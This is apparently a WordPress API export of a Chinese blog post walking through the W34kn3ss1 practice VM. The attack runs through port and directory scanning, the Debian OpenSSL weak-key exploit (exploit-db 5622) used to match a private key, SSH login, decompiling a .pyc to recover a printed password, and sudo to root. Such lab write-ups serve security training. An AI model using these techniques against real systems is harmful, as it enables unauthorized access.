{"id":335,"date":"2024-05-04T10:22:51","date_gmt":"2024-05-04T02:22:51","guid":{"rendered":"http:\/\/xiyu12.top\/?p=335"},"modified":"2024-05-04T10:22:51","modified_gmt":"2024-05-04T02:22:51","slug":"w34kn3ss1","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=335","title":{"rendered":"W34kn3ss1"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sT --min-rate 10000 -p- 192.168.1.143\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-04 08:53 CST\nNmap scan report for weakness.jth (192.168.1.143)\nHost is up (0.00088s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT    STATE SERVICE\n22\/tcp  open  ssh\n80\/tcp  open  http\n443\/tcp open  https\nMAC Address: 00:0C:29:D3:FE:58 (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 3.48 seconds\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sC -sV -p 80,22,443 192.168.1.143    \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-04 08:53 CST\nNmap scan report for weakness.jth (192.168.1.143)\nHost is up (0.00033s latency).\n\nPORT    STATE SERVICE  VERSION\n22\/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 de:89:a2:de:45:e7:d6:3d:ef:e9:bd:b4:b6:68:ca:6d (RSA)\n|   256 1d:98:4a:db:a2:e0:cc:68:38:93:d0:52:2a:1a:aa:96 (ECDSA)\n|_  256 3d:8a:6b:92:0d:ba:37:82:9e:c3:27:18:b6:01:cd:98 (ED25519)\n80\/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Hmmmm ??\n443\/tcp open  ssl\/http Apache httpd 2.4.29 ((Ubuntu))\n| ssl-cert: Subject: commonName=weakness.jth\/organizationName=weakness.jth\/stateOrProvinceName=Jordan\/countryName=jo\n| Not valid before: 2018-05-05T11:12:54\n|_Not valid after:  2019-05-05T11:12:54\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n| tls-alpn: \n|_  http\/1.1\n|_http-title: Apache2 Ubuntu Default Page: It works\n|_ssl-date: TLS randomness does not represent time\nMAC Address: 00:0C:29:D3:FE:58 (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 13.72 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7nmap\u7684\u626b\u63cf  \u53ef\u4ee5\u53d1\u73b0  443\u7aef\u53e3\u6709\u4e00\u4e2assl \u8bc1\u4e66  \u8bc1\u4e66\u7684\u901a\u7528\u540d\u79f0\uff0c\u901a\u5e38\u7528\u4e8e\u6807\u8bc6\u8bc1\u4e66\u5bf9\u5e94\u7684\u57df\u540d\u6216\u4e3b\u673a\u540d  \u6211\u4eec\u5f97\u5230\u4e86\u4e00\u4e2a\u57df\u540d  weakness.jth<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">echo &#8220;192.168.1.143 weakness.jth&#8221; | sudo tee -a \/etc\/hosts<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528 \u57df\u540d weakness.jth   \u8bbf\u95ee<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u9875\u9762\u4e2d\u51fa\u73b0\u4e86banner \u65f6  \u6beb\u65e0\u7591\u95ee \u8fd9\u662f\u5f88\u6709\u53ef\u80fd\u6ca1\u6709\u4ec0\u4e48\u610f\u4e49\u7684\uff0c\u4f46\u662f\u51fa\u73b0\u4e86\u53ef\u8bfb\u7684\u5b57\u7b26\u65f6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd8\u662f\u8981\u8ba4\u771f\u7684\u770b\u4e00\u770b    \u8fd9\u91cc\u6709\u4e00\u4e2an30<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-100854-1024x433.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-100854-1024x433.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-336\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/weakness.jth\/  --wordlist=\/usr\/share\/wordlists\/dirb\/big.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n&#91;+] Url:                     http:\/\/weakness.jth\/\n&#91;+] Method:                  GET\n&#91;+] Threads:                 10\n&#91;+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n&#91;+] Negative Status codes:   404\n&#91;+] User Agent:              gobuster\/3.6\n&#91;+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.htpasswd            (Status: 403) &#91;Size: 296]\n\/.htaccess            (Status: 403) &#91;Size: 296]\n\/private              (Status: 301) &#91;Size: 314] &#91;--> http:\/\/weakness.jth\/private\/]\n\/robots.txt           (Status: 200) &#91;Size: 14]\n\/server-status        (Status: 403) &#91;Size: 300]\nProgress: 20469 \/ 20470 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee   http:\/\/weakness.jth\/private\/   \u4e0b\u8f7d \u8fd9\u4e2a\u516c\u94a5mykey.pub   \u7136\u540e\u67e5\u770bnotes.txt<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-101241.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-101241.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-337\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">this key was generated by openssl 0.9.8c-1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">OpenSSL 0.9.8c-1 \u7248\u672c\u5230 0.9.8g-9 \u7248\u672c\u4e4b\u524d\u7684 Debian \u7cfb\u7edf\u5b58\u5728\u4e00\u4e2a\u6f0f\u6d1e\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u6d89\u53ca\u5230\u968f\u673a\u6570\u751f\u6210\u5668\u751f\u6210\u53ef\u9884\u6d4b\u7684\u6570\u5b57\uff0c\u4ece\u800c\u4f7f\u8fdc\u7a0b\u653b\u51fb\u8005\u66f4\u5bb9\u6613\u5bf9\u52a0\u5bc6\u5bc6\u94a5\u8fdb\u884c\u66b4\u529b\u731c\u6d4b\u653b\u51fb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>searchsploit prng\n\nsearchsploit -m linux\/remote\/5622.txt\n\nwget https:\/\/gitlab.com\/exploit-database\/exploitdb-bin-sploits\/-\/raw\/main\/bin-sploits\/5622.tar.bz2\n\ntar -vcxjf    5622.tar.bz2<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">cd  rsa\/2048  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo grep -lr\u00a0 &#8220;\u5728\u516c\u94a5\u4e2d\u622a\u53d6\u4e00\u6bb5\u5b57\u7b26&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u627e\u5230\u540c\u540d\u7684\u79c1\u94a5   \u590d\u5236\u51fa\u53bb<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">chmod 600 id_rsa<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> cat mykey.pub \nssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg\/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47\/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j\/C5sIIqM\/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE\/4Iklgw== root@targetcluster<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">root  \u901a\u5e38\u65e0\u6cd5 \u4f7f\u7528ssh \u767b\u9646  \u8bd5\u4e00\u4e0b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ssh -i id_rsa root@192.168.1.143   \u5931\u8d25\u4e86<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u65f6\u5019\u53ef\u4ee5\u60f3\u5230\u4e0a\u9762\u7684\u90a3\u4e2a\u5b57\u7b26\u5417\uff1f\u505a\u4fe1\u606f\u8bb0\u5f55\u771f\u662f\u65e0\u6bd4\u91cd\u8981  \u66f4\u91cd\u8981\u7684\u662f\u6709\u4e00\u4e2a\u5168\u5c40\u7684\u601d\u7ef4<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u65f6\u523b\u60f3\u8d77\u81ea\u5df1\u7684\u8bb0\u5f55<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ssh -i id_rsa n30@192.168.1.143  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u9646\u6210\u529f<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"> \u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>ls\ncode user.txt<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>file  code\ncode: python 2.7 byte-compiled\n\u5bf9\u4e8ePython 2.7\u7684\u6e90\u4ee3\u7801\u6587\u4ef6\uff0c\u5982\u679c\u9700\u8981\u8fdb\u884c\u5b57\u8282\u7f16\u8bd1\uff08byte-compile\uff09\uff0c\u53ef\u4ee5\u4f7f\u7528Python\u5185\u7f6e\u7684compileall\u6a21\u5757\u3002compileall\u6a21\u5757\u53ef\u4ee5\u9012\u5f52\u5730\u7f16\u8bd1\u6307\u5b9a\u76ee\u5f55\u4e0b\u7684\u6240\u6709Python\u6587\u4ef6\uff0c\u5e76\u751f\u6210\u5bf9\u5e94\u7684.pyc\u6587\u4ef6\u3002\n\u8fd9\u662f .pyc \u6587\u4ef6<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">mv code code.pyc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528 \u5728\u7ebfpython\u53cd\u7f16\u8bd1   <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-103053-1024x787.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-103053-1024x787.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-340\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u53ef\u4ee5\u4f7f\u7528  \u5de5\u5177  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/rocky\/python-uncompyle6\">rocky\/python-uncompyle6\uff1a\u4e00\u4e2a\u8de8\u7248\u672c\u7684 Python \u5b57\u8282\u7801\u53cd\u7f16\u8bd1\u5668 (github.com)<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo pip install uncompyle6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">uncompyle6 code.pyc<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-103253.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-04-103253.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-341\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">cat code.py | grep -Po &#8220;&#8216;(.*)'&#8221; | xargs<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f97\u5230\u4e00\u4e2a\u51ed\u8bc1  n30:dMASDNB!!#B!#!#33<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo -l\n&#91;sudo] password for n30: \nMatching Defaults entries for n30 on W34KN3SS:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser n30 may run the following commands on W34KN3SS:\n    (ALL : ALL) ALL\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">sudo su<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u4fe1\u606f\u6536\u96c6 \u901a\u8fc7nmap\u7684\u626b\u63cf \u53ef\u4ee5\u53d1\u73b0 443\u7aef\u53e3\u6709\u4e00\u4e2assl \u8bc1\u4e66 \u8bc1\u4e66\u7684\u901a\u7528\u540d\u79f0\uff0c\u901a\u5e38\u7528\u4e8e\u6807\u8bc6\u8bc1\u4e66\u5bf9\u5e94 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[13,65,85,89,97],"class_list":["post-335","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-pyc","tag-prng","tag-ssh","tag-ssl-","tag-uncompyle6-python"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=335"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/335\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=335"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}